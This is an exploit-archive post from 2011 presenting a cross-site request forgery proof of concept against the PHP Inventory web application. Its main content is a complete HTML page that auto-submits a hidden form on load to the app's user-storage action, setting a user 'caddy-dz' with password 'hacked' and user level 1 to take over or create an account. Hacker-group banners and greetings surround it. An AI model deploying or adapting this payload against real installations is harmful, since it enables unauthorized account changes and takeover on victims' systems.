PHP Inventory <= XSRF Vulnerabelity

=================================================================================
                      .__         .__ __            .__    .___

____ ___ _________ | |   ____ |__|/ |_          |__| __| _/
_/ __ \\ \/ /\____ \| | / _ \| \   __\ ______ | |/ __ |
\ ___/ >    < | |_> > |_( <_> ) || |   /_____/ | / /_/ |

\___ >__/\_ \|   __/|____/\____/|__||__|           |__\____ |
     \/      \/|__|                                          \/

Exploit-ID is the Indonesian Exploit Archive

Web             : exploit-id.com

e-mail          : root[at]exploit-id.com

                      #########################################
                       I'm Caddy-Dz , member from exploit-id.com

                      #########################################
================================================================================
####
# Exploit Title: PHP Inventory <= XSRF Vulnerabelity
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia@hotmail.com | Caddy-Dz@exploit-id.com
# Category:: webapps
# Download: http://www.phpwares.com/
# Tested on: [Windows Vista Edition Intégrale]
####

||> Special Greeting To: KedAns-Dz & All Algerians Hackers

####

[*] ## ExPLo!T: /| Edit User |\

<html>
<head>
<title>PHP Inventory XSRF Vulnerabelity</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">

function fireForms()
{
    var count = 1;
    var i=0;

    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
    }
}

</script>
<form action="http://127.0.0.1/[Path]/index.php?sub=workers&action=store" method="post" name="edit" enctype="multipart/form-data">

<input type="hidden" name="user_date" value="1106772292">
<input type="hidden" name="user_level" value="1">
<input type="hidden" name="return" value="%2Fdemo%2Fphp-inventory%2Findex.php%3Fsub%3Dworkers">
<input type="hidden" name="returnurl" value="%2Fdemo%2Fphp-inventory%2Findex.php%3Fsub%3Dworkers">

              <input type="hidden" name="user_name" value="caddy-dz">
<input type="hidden" id="user_password" name="user_password" value="hacked">
<input type="hidden" id="user_password_confirm" name="user_password_confirm" value="hacked">
<input type="hidden" name="user_email" value="caddy-dz@exploit-id.com">
<input type="hidden" name="user_email2" value="islam_babia@hotmail.com">
<input type="hidden" name="user_address" value="2557 S Dennison Court">
<input type="hidden" name="user_city" value="islem">

<option type="hidden" value="" >[ select ]</option>
                                                        <option type="hidden" value="CO"   selected="selected" >Colorado</option>
<input type="hidden" name="user_zip" maxlength="" value="80222">

<option value="" >[ select ]</option>
<option value="DZ" selected="selected" >Algeria</option>
<input type="hidden" name="user_phone" value="313-757-5555">
<input type="hidden" name="user_im_aol" value="aol">
<input type="hidden" name="user_im_icq" value="icq">
<input type="hidden" name="user_im_msn" value="msn">
<input type="hidden" name="user_im_yahoo" value="yahoo">
<input type="hidden" name="user_im_other" value="other">
</form>

</body>
</html>

####

Peace From Algeria

####

||> Exploit-id will not die

=================================**Algerians Hackers**=======================================
# Greets To :
KedAns-Dz & **All Algerians Hackers** , jos_ali_joe , All Exploit-Id Team , (exploit-id.com)
(1337day.com) , (09exploit.com) , All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer ,
   MaaTar , St0fa , Nissou , RmZ ...others
============================================================================================

EKU-ID: 366	CVE:	OSVDB-ID:
Author: Caddy-Dz	Published: 2011-05-31	Verified:
Download:

Rating